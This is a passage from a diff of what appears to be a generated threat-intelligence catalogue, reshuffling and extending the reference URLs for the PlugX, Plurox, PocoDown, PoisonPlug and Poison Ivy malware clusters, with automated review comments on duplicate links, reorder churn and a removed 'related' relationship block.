- "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html",
- "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/",
- "https://www.nortonlifelock.com/sites/default/files/2021-10/OPERATION%20EXORCIST%20White%20Paper.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/plugx-a-talisman-to-behold.html",
+ "https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/",
+ "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html",
+ "https://kienmanowar.wordpress.com/2023/01/09/quicknote-another-nice-plugx-sample/",
"https://risky.biz/whatiswinnti/",
- "https://or10nlabs.tech/reverse-engineering-the-new-mustang-panda-plugx-downloader/",
- "https://www.secureworks.com/blog/bronze-president-targets-russian-speakers-with-updated-plugx",
- "https://www.macnica.net/file/security_report_20160613.pdf",
- "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf",
+ "https://blog.xorhex.com/blog/mustangpandaplugx-1/",
+ "https://www.youtube.com/watch?v=E2_DTQJjDYc",
"https://securelist.com/cycldek-bridging-the-air-gap/97157/",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/",
+ "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor",
"https://www.recordedfuture.com/redecho-targeting-indian-power-sector/",
- "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-loader",
- "https://www.secureworks.com/blog/bronze-president-targets-government-officials",
- "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
"https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader",
- "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
- "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/",
- "https://silascutler.blogspot.com/2019/11/fresh-plugx-october-2019.html",
- "https://www.darkreading.com/threat-intelligence/chinese-apt-bronze-president-spy-campaign-russian-military",
- "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html",
- "https://threatpost.com/chinese-apt-combines-fresh-hodur-rat-with-complex-anti-detection/179084/",
- "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
- "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf",
- "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/",
- "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html",
- "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf",
- "https://www.us-cert.gov/ncas/alerts/TA17-117A",
- "https://www.youtube.com/watch?v=C_TmANnbS2k",
+ "https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/",
+ "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf",
+ "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html",
"https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf",
- "https://www.welivesecurity.com/fr/2022/03/25/mustang-pandas-hodur-nouveau-korplug/",
- "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia",
- "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt",
- "https://blog.ensilo.com/uncovering-new-activity-by-apt10",
- "https://www.trendmicro.com/en_us/research/21/a/xdr-investigation-uncovers-plugx-unique-technique-in-apt-attack.html",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://attack.mitre.org/groups/G0001/",
+ "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
+ "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-express",
+ "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
+ "https://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/",
+ "https://engineers.ffri.jp/entry/2022/11/30/141346",
+ "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/",
+ "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "https://silascutler.blogspot.com/2019/11/fresh-plugx-october-2019.html",
+ "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
+ "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
+ "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims",
+ "https://www.lac.co.jp/lacwatch/people/20171218_001445.html",
+ "https://blog.xorhex.com/blog/reddeltaplugxchangeup/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
+ "https://www.macnica.net/file/security_report_20160613.pdf",
+ "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-rat-extracting-the-config/",
+ "https://raw.githubusercontent.com/m4now4r/Presentations/main/MustangPanda%20-%20Enemy%20at%20the%20gate_final.pdf",
+ "https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc-phan2.html",
+ "https://www.contextis.com/en/blog/avivore",
+ "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html",
+ "https://www.nortonlifelock.com/sites/default/files/2021-10/OPERATION%20EXORCIST%20White%20Paper.pdf",
+ "https://www.trendmicro.com/en_us/research/23/b/investigating-the-plugx-trojan-disguised-as-a-legitimate-windows.html",
+ "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
+ "https://redalert.nshc.net/2022/04/14/hacking-activity-of-sectorb-group-in-2021/",
"https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european",
- "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
+ "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/",
+ "https://www.cybereason.com/blog/threat-analysis-report-plugx-rat-loader-evolution",
+ "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/",
"https://www.youtube.com/watch?v=IRh6R8o1Q7U",
- "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
+ "https://cyberandramen.net/2022/01/06/a-gulp-of-plugx/",
+ "https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
+ "https://therecord.media/redecho-group-parks-domains-after-public-exposure/",
+ "https://www.uscc.gov/sites/default/files/2022-02/Adam_Kozy_Testimony.pdf",
+ "https://www.zdnet.com/article/chinese-state-hackers-target-hong-kong-catholic-church/",
"https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/",
- "https://therecord.media/indonesian-intelligence-agency-compromised-in-suspected-chinese-hack/",
+ "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html",
+ "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf",
+ "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
+ "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/",
+ "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
+ "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/",
+ "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
+ "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0915.pdf",
+ "https://securelist.com/time-of-death-connected-medicine/84315/",
+ "https://tracker.h3x.eu/info/290",
+ "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/",
+ "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/",
+ "https://threatpost.com/chinese-apt-combines-fresh-hodur-rat-with-complex-anti-detection/179084/",
+ "https://news.sophos.com/en-us/2023/03/09/border-hopping-plugx-usb-worm/",
+ "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/",
+ "https://attack.mitre.org/groups/G0096",
+ "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
+ "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html",
+ "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html",
+ "https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/",
+ "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt",
+ "https://www.youtube.com/watch?v=C_TmANnbS2k",
+ "https://www.secureworks.com/research/bronze-president-targets-ngos",
+ "https://community.rsa.com/thread/185439",
+ "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf",
+ "https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/",
+ "https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/",
+ "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html",
+ "https://jsac.jpcert.or.jp/archive/2023/pdf/JSAC2023_2_LT4.pdf",
+ "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-",
+ "https://web.archive.org/web/20191214125833/https://contextis.com/media/downloads/AVIVORE_An_overview.pdf",
+ "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-olive",
+ "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://www.contextis.com/en/blog/dll-search-order-hijacking",
+ "https://www.youtube.com/watch?v=6SDdUVejR2w",
+ "https://unit42.paloaltonetworks.com/unsigned-dlls/",
+ "https://www.bleepingcomputer.com/news/security/new-mustang-panda-hacking-campaign-targets-diplomats-isps/",
+ "https://www.secureworks.com/blog/bronze-president-targets-russian-speakers-with-updated-plugx",
+ "https://web.archive.org/web/20210925164035/https://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/",
+ "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/",
+ "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/",
+ "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf",
+ "https://blog.ensilo.com/uncovering-new-activity-by-apt10",
+ "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/",
+ "https://www.welivesecurity.com/fr/2022/03/25/mustang-pandas-hodur-nouveau-korplug/",
+ "https://blog.vincss.net/2022/05/re027-china-based-apt-mustang-panda-might-have-still-continued-their-attack-activities-against-organizations-in-Vietnam.html",
+ "https://blog.xorhex.com/blog/mustangpandaplugx-2/",
+ "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html",
+ "https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf",
+ "https://unit42.paloaltonetworks.com/thor-plugx-variant/",
+ "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf",
+ "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html",
+ "https://web.archive.org/web/20200424035112/https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf",
+ "https://www.recordedfuture.com/china-linked-ta428-threat-group",
+ "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/",
+ "https://www.youtube.com/watch?v=qEwBGGgWgOM",
+ "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf",
"https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
- "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf"
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage",
+ "https://www.darkreading.com/threat-intelligence/chinese-apt-bronze-president-spy-campaign-russian-military",
+ "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia",
+ "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/",
+ "https://or10nlabs.tech/reverse-engineering-the-new-mustang-panda-plugx-downloader/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-woodland",
+ "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
+ "https://www.us-cert.gov/ncas/alerts/TA17-117A",
+ "https://twitter.com/xorhex/status/1399906601562165249?s=20",
+ "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
+ "https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
+ "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-loader",
+ "https://twitter.com/stvemillertime/status/1261263000960450562",
+ "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
+ "https://www.trendmicro.com/en_us/research/21/a/xdr-investigation-uncovers-plugx-unique-technique-in-apt-attack.html",
+ "https://www.youtube.com/watch?v=r1zAVX_HnJg",
+ "https://www.secureworks.com/blog/bronze-president-targets-government-officials",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf",
+ "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
+ "https://attack.mitre.org/groups/G0001/",
+ "https://therecord.media/indonesian-intelligence-agency-compromised-in-suspected-chinese-hack/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
+ "https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets",
+ "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report",
+ "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
+ "https://decoded.avast.io/threatintel/apt-treasure-trove-avast-suspects-chinese-apt-group-mustang-panda-is-collecting-data-from-burmese-government-agencies-and-opposition-groups/",
+ "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited",
+ "https://www.secureworks.com/research/threat-profiles/bronze-president"
],
"synonyms": [
"Destroy RAT",
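Review bot: the rewritten PlugX `refs` array ends up containing near-duplicate entries that differ only by a trailing slash or by a scheme/host variant, so the generator should canonicalise URLs before emitting the list. Both `"https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia"` and the same URL with a trailing `/` are added, as are `".../luckymouse-ta428-compromise-able-desktop/"` and `".../luckymouse-ta428-compromise-able-desktop"`, and the `http://blog.jpcert.or.jp/.s/2017/04/redleaves...` and `https://blogs.jpcert.or.jp/en/2017/04/redleaves...` links point at the same article. Suggest deduplicating on a normalised form (scheme, host, path with trailing slash stripped) so each source appears once. Separately, most `-`/`+` pairs in this hunk are moves rather than changes (the ComputerWeekly Airbus article, for instance, is removed and re-added), which buries the genuinely new references; emitting `refs` in a stable sorted order would reduce the hunk to the real additions.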
@@ -36125,15 +38051,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "f4b159ea-97e5-483b-854b-c48a78d562aa",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "036bd099-fe80-46c2-9c4c-e5c6df8dcdee",
"value": "PlugX"
},
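Review bot: removing the `related` block from the PlugX cluster drops its only cross-cluster link (the `similar` relation to `dest-uuid` `f4b159ea-97e5-483b-854b-c48a78d562aa`, tagged `estimative-language:likelihood-probability="almost-certain"`) with nothing put in its place in this hunk. If relationships are now maintained outside this file, that is fine but should be stated in the commit message; otherwise the block should be kept, because consumers that pivot on `related` lose the link and the `036bd099-...` entry is left with no relationship metadata at all.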
@@ -36142,8 +38059,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.plurox",
- "https://sysopfb.github.io/malware,/crypters/2019/09/23/Plurox-packer-layer-unpacked.html",
- "https://securelist.com/plurox-modular-backdoor/91213/"
+ "https://securelist.com/plurox-modular-backdoor/91213/",
+ "https://sysopfb.github.io/malware,/crypters/2019/09/23/Plurox-packer-layer-unpacked.html"
],
"synonyms": [],
"type": []
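Review bot: the Plurox `refs` change only swaps the order of the securelist and sysopfb entries, adding and removing nothing, so the hunk is pure churn. Since this JSON is generated, the generator should emit `refs` in a deterministic order (sorted, or consistently in the order the upstream source returns them) so that reorder-only hunks like this one do not appear and real reference additions stay visible in review.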
@@ -36183,9 +38100,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pocodown",
+ "https://twitter.com/cyb3rops/status/1129653190444703744",
"https://threatvector.cylance.com/en_us/home/inside-the-apt28-dll-backdoor-blitz.html",
- "https://threatvector.cylance.com/en_us/home/flirting-with-ida-and-apt28.html",
- "https://twitter.com/cyb3rops/status/1129653190444703744"
+ "https://threatvector.cylance.com/en_us/home/flirting-with-ida-and-apt28.html"
],
"synonyms": [
"Blitz",
@@ -36201,12 +38118,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.poisonplug",
+ "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html",
"https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
"https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://content.fireeye.com/apt-41/rpt-apt41/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html",
- "https://content.fireeye.com/apt-41/rpt-apt41/"
+ "https://securelist.com/apt-trends-report-q3-2020/99204/"
],
"synonyms": [
"Barlaiy"
@@ -36221,53 +38138,54 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy",
- "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/",
- "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant",
- "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html",
"https://www.secureworks.com/research/threat-profiles/bronze-union",
- "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/",
- "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
- "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
- "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
- "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/",
- "https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
- "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
"https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf",
- "https://lab52.io/blog/icefog-apt-group-abusing-recent-conflict-between-iran-and-eeuu/",
- "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
- "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html",
- "https://www.youtube.com/watch?v=1WfPlgtfWnQ",
- "https://attack.mitre.org/groups/G0011",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf",
- "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf",
- "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
- "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
"https://vblocalhost.com/uploads/VB2020-20.pdf",
- "http://blogs.360.cn/post/APT_C_01_en.html",
+ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
+ "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
+ "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf",
+ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf",
+ "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
+ "https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis",
+ "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html",
+ "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant",
+ "https://attack.mitre.org/groups/G0011",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf",
+ "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
+ "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
+ "https://www.youtube.com/watch?v=1WfPlgtfWnQ",
+ "https://engineers.ffri.jp/entry/2022/11/30/141346",
+ "https://lab52.io/blog/icefog-apt-group-abusing-recent-conflict-between-iran-and-eeuu/",
+ "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html",
+ "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/",
+ "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/",
"http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf",
- "https://community.riskiq.com/article/56fa1b2f",
+ "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
+ "http://blogs.360.cn/post/APT_C_01_en.html",
+ "https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
+ "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment",
+ "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf",
"https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
"https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/",
+ "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology",
"https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii",
"https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/",
"https://unit42.paloaltonetworks.com/atoms/crawling-taurus/",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://community.riskiq.com/article/56fa1b2f",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
"https://www.recordedfuture.com/china-linked-ta428-threat-group",
- "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html",
- "https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis",
- "https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf",
- "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf",
- "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology",
- "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
- "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/"
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/",
+ "https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf"
],
"synonyms": [
"SPIVY",
